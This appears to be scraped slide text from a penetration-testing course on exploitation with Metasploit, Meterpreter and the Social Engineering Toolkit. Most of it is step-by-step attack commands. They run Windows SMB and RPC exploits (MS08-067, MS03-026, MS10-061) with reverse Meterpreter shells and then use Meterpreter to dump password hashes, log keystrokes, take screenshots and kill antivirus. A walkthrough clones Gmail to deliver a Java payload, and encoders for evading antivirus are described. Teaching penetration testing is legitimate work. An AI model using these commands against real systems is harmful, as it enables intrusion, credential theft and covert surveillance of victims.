Professional Documents
Culture Documents
Exploitation
Using any unauthorized tools will get you fired/arrested/deported/smited by God, etc... This course is not intended to make you a cracker
Exploitation
However, the most dangerous and very effective attacks used by malicious users today are
system allowing an attacker to violate the confidentiality, integrity, availability, access control, consistency or audit mechanisms of the system or the data and applications it hosts
Buffer overflows Memory leaks Dead locks Arithmetic overflow Accessing protected memory (Access Violation) etc.
Exploitation Exploits
Regardless the type of software bug we are speaking of Triggers an unexpected condition in program
generating an event that the program is not designed to recover successfully Redirect execution in a controlled way to run the payload The payload is a sequence of code that is executed when the vulnerability is triggered
To make things clear, an Exploit is really broken up into two parts: EXPLOIT = Vulnerability + Payload
Understanding Payloads
A Win32 payload will not work in Linux (even if we are exploiting the same bug) exec Execute a command or program on the remote system download_exec Download a file from a URL and execute upload_exec Upload a local file and execute adduser Add user to system accounts Unix /bin/sh Win command prompt cmd.exe Bind Shells and reverse Shells
Auxialiaries:
Encoders
Evades detection by antivirus, firefwall, IDS, IPS, etc. Encodes the payload during penetration operation
Metasploit Framework
Set of exploits to launch against a box Potentially own the box Build a real exploit for your own purposes
General interface for testing & writing exploit Will not make you a cracker
MSFConsole
Most efficient, powerful, and all-in-one centralized frontend interfaces For penetration testers to use metasploit
$ cd /pentest/exploits/framework/ $ ./msfconsole $ msf > help $ show exploits $ show payloads $ show encoders $ show -h
10
MSFConsole
$ ./msfconsole $ msf > use exploit/windows/smb/ms08_067_netapi $ msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
MSFConsole
12
Exploitation Metasploit
Metasploit: getting a shell
13
Exploitation Metasploit
14
Exploitation Meterpreter
Upload/download files Read/write to registry Change file access times Execute programs
15
Exploitation Exploits
ms08-067 October 2008 (1/3 machines still vuln) ms03-026 September 2003
16
MSFConsole
$ ./msfconsole $ msf > use exploit/windows/smb/ms08_067_netapi $ msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) show options msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
MSFConsole
$ ./msfconsole $ msf > use exploit/windows/dcerpc/ms03_026_dcom $ msf exploit(ms03_026_dcom) > show options msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms03_026_dcom) > set LHOST 192.168.1.10 msf exploit(ms03_026_dcom) > set RHOST 192.168.1.17 msf exploit(ms03_026_dcom) > exploit
18
MSFConsole
$ ./msfconsole $ msf > use exploit/windows/browser/ms10_046_icon_dllloader $ msf exploit(ms10_046_icon_dllloader) > show options msf exploit(ms10_046_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_046_icon_dllloader) > set LHOST 192.168.1.10 msf exploit(ms08_067_netapi) > exploit In browser of victime, enter the IP address of the attacker
19
MSFConsole
msf > use exploit/windows/smb/ms10_061_spoolss msf exploit(ms10_061_spoolss) > show payloads msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_061_spoolss) > set LHOST [MY IP ADDRESS] msf exploit(ms10_061_spoolss) > set RHOST [TARGET IP] msf exploit(ms10_061_spoolss) > exploit
20
10
Information gathering
> use auxiliary/scanner/ip/ipidseq auxiliary(ipidseq) > show options auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24 auxiliary(ipidseq) > set THREADS 50 auxiliary(ipidseq) > run auxiliary(ipidseq) > nmap -PN -sI 192.168.1.109 192.168.1.155
21
Exploitation Meterpreter
Meterpreter
A Metasploit payload Injects itself into target process as a .dll To cover your tracks
22
11
MSFConsole
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > show payloads ... msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options ... msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
MSFConsole
meterpreter > run hashdump meterpreter > ps meterpreter > migrate 3172 meterpreter > getpid meterpreter > getuid meterpreter > use_priv (to enable keystroke, you must load priv extension) meterpreter > keyscan_start //(keystroke) meterpreter > keyscan_dump meterpreter > keyscan_stop meterpreter > screenshot meterpreter > shell meterpreter > run vnc meterpreter > run killav (to kill the antivirus)
24
12
Exploitation Meterpreter
25
13
There is a "social engineering" aspect in most hacking Tricking a user into making a mistake, that lets you in
Clicking a link Ignoring an error message Opening an attachment etc. Target: Win 7 Vuln: Java 0-Day
Today's Attack
Evil Web Server Attacker: Evil Web Server with Cloned Gmail Page
14
Social Engineering
http://www.secmaniac.com/blog/2011/01/01/bypass-windows-uac/
Commands
cd /pentest/exploits/SET ./set Enter option 1: Social Engineering Attacks Enter option 2: Website Attack Vectors Enter option 1: The Java Attack Method Enter option 2: Site Cloner Enter url https://gmail.com It asks you "What payload do you want to generate:" and lists 11 choices It shows a list of 16 encodings to try and bypass AV.
Press Enter for default Press Enter for default Enter no Press Enter for default: 2. (Windows Reverse_TCP Meterpreter)
It asks you to "Enter the PORT of the listener (enter for default): It asks you whether you want to create a Linux.OSX reverse_tcp payload. It now shows blue text saying:
[*] Launching MSF Listener... [*] This may take a few to load MSF...
Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this message:
msf exploit(handler) >
15
Commands
GAME OVER
The target is now owned. We can
Capture screenshots Capture keystrokes Turn on the microphone and listen Turn on the webcam and take photo Steal password hashes etc.
16
Commands to try:
Get Antivirus Install patches (when they exist) Keep image-based backups so you can recover after an infection
17
18